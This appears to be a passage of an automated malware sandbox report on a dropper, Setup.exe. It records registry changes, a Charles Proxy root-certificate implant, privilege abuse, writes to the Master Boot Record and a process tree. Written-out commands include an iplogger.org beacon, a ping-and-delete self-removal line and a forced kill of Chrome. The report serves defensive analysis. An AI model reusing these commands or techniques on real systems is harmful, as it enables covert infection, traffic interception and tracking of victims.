MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 23d6e554670ed701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000059a3203eb95833dba374451cf26c207ce99f8b6ffdb2c5a7ce7554a55239e1e0c0cabfdc828205bc5b1740ca9b243fedba97ba64306bb1bd846cba11bff3e3e65dbbd1ec4a51e320e5caebf271f94360db6b5739c36ad9bc2ca1 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{006E627C-3482-4CAE-97E4-8F17E655BD10} = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{27E91EB8-0A5A-405D-9575-15B9983D50F7}" MicrosoftEdge.exe -
Processes:
Setup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 5948 regedit.exe 6048 regedit.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 3824 PING.EXE 1112 PING.EXE 4232 PING.EXE 5556 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1614581416292.exe1614581421558.exe1614581426933.exe23E04C4F32EF2158.tmpseed.exepid process 2312 1614581416292.exe 2312 1614581416292.exe 3768 1614581421558.exe 3768 1614581421558.exe 1848 1614581426933.exe 1848 1614581426933.exe 2908 23E04C4F32EF2158.tmp 2908 23E04C4F32EF2158.tmp 1332 seed.exe 1332 seed.exe 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MicrosoftEdgeCP.exeseed.exeE1AC.exepid process 4048 MicrosoftEdgeCP.exe 1332 seed.exe 5312 E1AC.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 3984 msiexec.exe Token: SeIncreaseQuotaPrivilege 3984 msiexec.exe Token: SeSecurityPrivilege 2928 msiexec.exe Token: SeCreateTokenPrivilege 3984 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3984 msiexec.exe Token: SeLockMemoryPrivilege 3984 msiexec.exe Token: SeIncreaseQuotaPrivilege 3984 msiexec.exe Token: SeMachineAccountPrivilege 3984 msiexec.exe Token: SeTcbPrivilege 3984 msiexec.exe Token: SeSecurityPrivilege 3984 msiexec.exe Token: SeTakeOwnershipPrivilege 3984 msiexec.exe Token: SeLoadDriverPrivilege 3984 msiexec.exe Token: SeSystemProfilePrivilege 3984 msiexec.exe Token: SeSystemtimePrivilege 3984 msiexec.exe Token: SeProfSingleProcessPrivilege 3984 msiexec.exe Token: SeIncBasePriorityPrivilege 3984 msiexec.exe Token: SeCreatePagefilePrivilege 3984 msiexec.exe Token: SeCreatePermanentPrivilege 3984 msiexec.exe Token: SeBackupPrivilege 3984 msiexec.exe Token: SeRestorePrivilege 3984 msiexec.exe Token: SeShutdownPrivilege 3984 msiexec.exe Token: SeDebugPrivilege 3984 msiexec.exe Token: SeAuditPrivilege 3984 msiexec.exe Token: SeSystemEnvironmentPrivilege 3984 msiexec.exe Token: SeChangeNotifyPrivilege 3984 msiexec.exe Token: SeRemoteShutdownPrivilege 3984 msiexec.exe Token: SeUndockPrivilege 3984 msiexec.exe Token: SeSyncAgentPrivilege 3984 msiexec.exe Token: SeEnableDelegationPrivilege 3984 msiexec.exe Token: SeManageVolumePrivilege 3984 msiexec.exe Token: SeImpersonatePrivilege 3984 msiexec.exe Token: SeCreateGlobalPrivilege 3984 msiexec.exe Token: SeCreateTokenPrivilege 3984 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3984 msiexec.exe Token: SeLockMemoryPrivilege 3984 msiexec.exe Token: SeIncreaseQuotaPrivilege 3984 msiexec.exe Token: SeMachineAccountPrivilege 3984 msiexec.exe Token: SeTcbPrivilege 3984 msiexec.exe Token: SeSecurityPrivilege 3984 msiexec.exe Token: SeTakeOwnershipPrivilege 3984 msiexec.exe Token: SeLoadDriverPrivilege 3984 msiexec.exe Token: SeSystemProfilePrivilege 3984 msiexec.exe Token: SeSystemtimePrivilege 3984 msiexec.exe Token: SeProfSingleProcessPrivilege 3984 msiexec.exe Token: SeIncBasePriorityPrivilege 3984 msiexec.exe Token: SeCreatePagefilePrivilege 3984 msiexec.exe Token: SeCreatePermanentPrivilege 3984 msiexec.exe Token: SeBackupPrivilege 3984 msiexec.exe Token: SeRestorePrivilege 3984 msiexec.exe Token: SeShutdownPrivilege 3984 msiexec.exe Token: SeDebugPrivilege 3984 msiexec.exe Token: SeAuditPrivilege 3984 msiexec.exe Token: SeSystemEnvironmentPrivilege 3984 msiexec.exe Token: SeChangeNotifyPrivilege 3984 msiexec.exe Token: SeRemoteShutdownPrivilege 3984 msiexec.exe Token: SeUndockPrivilege 3984 msiexec.exe Token: SeSyncAgentPrivilege 3984 msiexec.exe Token: SeEnableDelegationPrivilege 3984 msiexec.exe Token: SeManageVolumePrivilege 3984 msiexec.exe Token: SeImpersonatePrivilege 3984 msiexec.exe Token: SeCreateGlobalPrivilege 3984 msiexec.exe Token: SeCreateTokenPrivilege 3984 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3984 msiexec.exe Token: SeLockMemoryPrivilege 3984 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msiexec.exe23E04C4F32EF2158.tmppid process 3984 msiexec.exe 2908 23E04C4F32EF2158.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exepid process 2264 MicrosoftEdge.exe 4048 MicrosoftEdgeCP.exe 4048 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup.exemsiexec.execmd.exe26FF190E7AE0F7C7.execmd.exe26FF190E7AE0F7C7.execmd.exedescription pid process target process PID 812 wrote to memory of 3984 812 Setup.exe msiexec.exe PID 812 wrote to memory of 3984 812 Setup.exe msiexec.exe PID 812 wrote to memory of 3984 812 Setup.exe msiexec.exe PID 2928 wrote to memory of 3764 2928 msiexec.exe MsiExec.exe PID 2928 wrote to memory of 3764 2928 msiexec.exe MsiExec.exe PID 2928 wrote to memory of 3764 2928 msiexec.exe MsiExec.exe PID 812 wrote to memory of 3508 812 Setup.exe 26FF190E7AE0F7C7.exe PID 812 wrote to memory of 3508 812 Setup.exe 26FF190E7AE0F7C7.exe PID 812 wrote to memory of 3508 812 Setup.exe 26FF190E7AE0F7C7.exe PID 812 wrote to memory of 1516 812 Setup.exe 26FF190E7AE0F7C7.exe PID 812 wrote to memory of 1516 812 Setup.exe 26FF190E7AE0F7C7.exe PID 812 wrote to memory of 1516 812 Setup.exe 26FF190E7AE0F7C7.exe PID 812 wrote to memory of 2124 812 Setup.exe cmd.exe PID 812 wrote to memory of 2124 812 Setup.exe cmd.exe PID 812 wrote to memory of 2124 812 Setup.exe cmd.exe PID 2124 wrote to memory of 3824 2124 cmd.exe PING.EXE PID 2124 wrote to memory of 3824 2124 cmd.exe PING.EXE PID 2124 wrote to memory of 3824 2124 cmd.exe PING.EXE PID 1516 wrote to memory of 3948 1516 26FF190E7AE0F7C7.exe cmd.exe PID 1516 wrote to memory of 3948 1516 26FF190E7AE0F7C7.exe cmd.exe PID 1516 wrote to memory of 3948 1516 26FF190E7AE0F7C7.exe cmd.exe PID 3948 wrote to memory of 748 3948 cmd.exe taskkill.exe PID 3948 wrote to memory of 748 3948 cmd.exe taskkill.exe PID 3948 wrote to memory of 748 3948 cmd.exe taskkill.exe PID 3508 wrote to memory of 1976 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 1976 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 1976 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 1976 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 1976 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 1976 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2312 3508 26FF190E7AE0F7C7.exe 1614581416292.exe PID 3508 wrote to memory of 2312 3508 26FF190E7AE0F7C7.exe 1614581416292.exe PID 3508 wrote to memory of 2312 3508 26FF190E7AE0F7C7.exe 1614581416292.exe PID 1516 wrote to memory of 1188 1516 26FF190E7AE0F7C7.exe cmd.exe PID 1516 wrote to memory of 1188 1516 26FF190E7AE0F7C7.exe cmd.exe PID 1516 wrote to memory of 1188 1516 26FF190E7AE0F7C7.exe cmd.exe PID 1188 wrote to memory of 1112 1188 cmd.exe PING.EXE PID 1188 wrote to memory of 1112 1188 cmd.exe PING.EXE PID 1188 wrote to memory of 1112 1188 cmd.exe PING.EXE PID 3508 wrote to memory of 2344 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2344 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2344 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2344 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2344 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2344 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 3768 3508 26FF190E7AE0F7C7.exe 1614581421558.exe PID 3508 wrote to memory of 3768 3508 26FF190E7AE0F7C7.exe 1614581421558.exe PID 3508 wrote to memory of 3768 3508 26FF190E7AE0F7C7.exe 1614581421558.exe PID 3508 wrote to memory of 2196 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2196 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2196 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2196 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2196 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 2196 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 wrote to memory of 1848 3508 26FF190E7AE0F7C7.exe 1614581426933.exe PID 3508 wrote to memory of 1848 3508 26FF190E7AE0F7C7.exe 1614581426933.exe PID 3508 wrote to memory of 1848 3508 26FF190E7AE0F7C7.exe 1614581426933.exe PID 3508 wrote to memory of 1324 3508 26FF190E7AE0F7C7.exe ThunderFW.exe PID 3508 wrote to memory of 1324 3508 26FF190E7AE0F7C7.exe ThunderFW.exe PID 3508 wrote to memory of 1324 3508 26FF190E7AE0F7C7.exe ThunderFW.exe PID 3508 wrote to memory of 3488 3508 26FF190E7AE0F7C7.exe MiniThunderPlatform.exe PID 3508 wrote to memory of 3488 3508 26FF190E7AE0F7C7.exe MiniThunderPlatform.exe PID 3508 wrote to memory of 3488 3508 26FF190E7AE0F7C7.exe MiniThunderPlatform.exe PID 3508 wrote to memory of 3708 3508 26FF190E7AE0F7C7.exe 23E04C4F32EF2158.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp12⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\1614581416292.exe"C:\Users\Admin\AppData\Roaming\1614581416292.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614581416292.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\1614581421558.exe"C:\Users\Admin\AppData\Roaming\1614581421558.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614581421558.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\1614581426933.exe"C:\Users\Admin\AppData\Roaming\1614581426933.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614581426933.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-43L5A.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-43L5A.tmp\23E04C4F32EF2158.tmp" /SL5="$601BC,746887,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s15⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"5⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
